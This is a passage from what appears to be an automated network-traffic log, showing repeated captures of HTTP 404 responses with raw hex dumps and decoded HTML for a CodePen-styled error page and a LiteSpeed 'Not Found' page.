6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:30 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 